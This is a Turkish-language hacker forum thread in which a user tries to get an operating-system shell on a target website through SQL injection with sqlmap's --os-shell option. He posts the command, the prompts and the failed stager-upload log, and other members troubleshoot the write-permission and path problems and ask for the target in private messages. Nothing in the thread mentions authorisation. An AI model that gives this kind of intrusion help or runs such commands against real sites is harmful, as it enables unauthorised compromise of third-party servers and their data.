Sql injection ile shell

[Ottoman_grandson]

Hedef site windows kullanıyor. Ve sql açığı var(injection).

Ben sqlmap -u https://hedeffsittee.com/index.php?id=2 -D 'tablo adı felan' --random-agent --risk=3 --os-shell Yazdığımda

[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)

bu çıkıyor 4 diyorum,

do you want sqlmap to further try to provoke the full path disclosure? [Y/n]

buna y diyorum

what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search


sonra bu çıkıyor hangisini denersem deneyim olmuyor yardımcı olursanız sevinirim

 

[Yagami Light0]

Hedef site windows kullanıyor. Ve sql açığı var(injection).

Ben sqlmap -u Kişisel Blog Sayfası - Hedef Blog -D 'tablo adı felan' --random-agent --risk=3 --os-shell Yazdığımda

[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)

bu çıkıyor 4 diyorum,

do you want sqlmap to further try to provoke the full path disclosure? [Y/n]

buna y diyorum

what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search


sonra bu çıkıyor hangisini denersem deneyim olmuyor yardımcı olursanız sevinirim

hedefsite.com diye site var . paylasiminiz silin !

 

[Ottoman_grandson]

hedefsite.com diye site var . paylasiminiz silin !

temsili olarak koymuştumda düzeltiyim hemen

 

[Arenklord]

php değil de aspx olarak dene o da olmazsa asp dene

 

[alexandre20]

php değil de aspx olarak dene o da olmazsa asp dene

Ne alakası var, belli ki sitede OUTFILE çalışmıyor. yetki kısıtlaması olabilir, veya windows server olabilir ki bu durumda shell çalıştıracak dosyanın oluşturulacağı dizin farklı olmalı. Custom locations [2]'yi seçip "./" girilirse muhtemelen sorun çözülecektir

 

[Ottoman_grandson]

Ne alakası var, belli ki sitede OUTFILE çalışmıyor. yetki kısıtlaması olabilir, veya windows server olabilir ki bu durumda shell çalıştıracak dosyanın oluşturulacağı dizin farklı olmalı. Custom locations [2]'yi seçip "./" girilirse muhtemelen sorun çözülecektir

Evet windows sanırım.

[19:38:43] [WARNING] unable to automatically parse any web server path
[19:38:43] [INFO] trying to upload the file stager on '/./' via LIMIT 'LINES TERMINATED BY' method
[19:38:43] [WARNING] potential permission problems detected ('Access denied')
[19:38:44] [WARNING] unable to upload the file stager on '/./'
[19:38:44] [INFO] trying to upload the file stager on '/./' via UNION method
[19:38:44] [WARNING] expect junk characters inside the file as a leftover from UNION query
[19:38:45] [WARNING] reflective value(s) found and filtering out
[19:38:45] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[19:38:45] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 5 times


bu hatayı alıyorum 2 seçip ./ yazdığımda

 

[alexandre20]

Evet windows sanırım.

[19:38:43] [WARNING] unable to automatically parse any web server path
[19:38:43] [INFO] trying to upload the file stager on '/./' via LIMIT 'LINES TERMINATED BY' method
[19:38:43] [WARNING] potential permission problems detected ('Access denied')
[19:38:44] [WARNING] unable to upload the file stager on '/./'
[19:38:44] [INFO] trying to upload the file stager on '/./' via UNION method
[19:38:44] [WARNING] expect junk characters inside the file as a leftover from UNION query
[19:38:45] [WARNING] reflective value(s) found and filtering out
[19:38:45] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[19:38:45] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 5 times


bu hatayı alıyorum 2 seçip ./ yazdığımda

hedef siteyi atabilir misin bir şeyi kontrol edicem
ayrıca bu hatayı alıyorsan 2 durum mümkün,
1- veritabanı hedef sistemde çalışmıyor, muhtemelen amazon'dan vs. kiralanan bir uzak veritabanında işlem görüyor, bu yüzden de dosya oluşturma yetkisi yok
2- veritabanı kullanıcısı'nın dosya oluşturma yetkisi yok.

 

[Ottoman_grandson]

hedef siteyi atabilir misin bir şeyi kontrol edicem
ayrıca bu hatayı alıyorsan 2 durum mümkün,
1- veritabanı hedef sistemde çalışmıyor, muhtemelen amazon'dan vs. kiralanan bir uzak veritabanında işlem görüyor, bu yüzden de dosya oluşturma yetkisi yok
2- veritabanı kullanıcısı'nın dosya oluşturma yetkisi yok.

dm atsana bi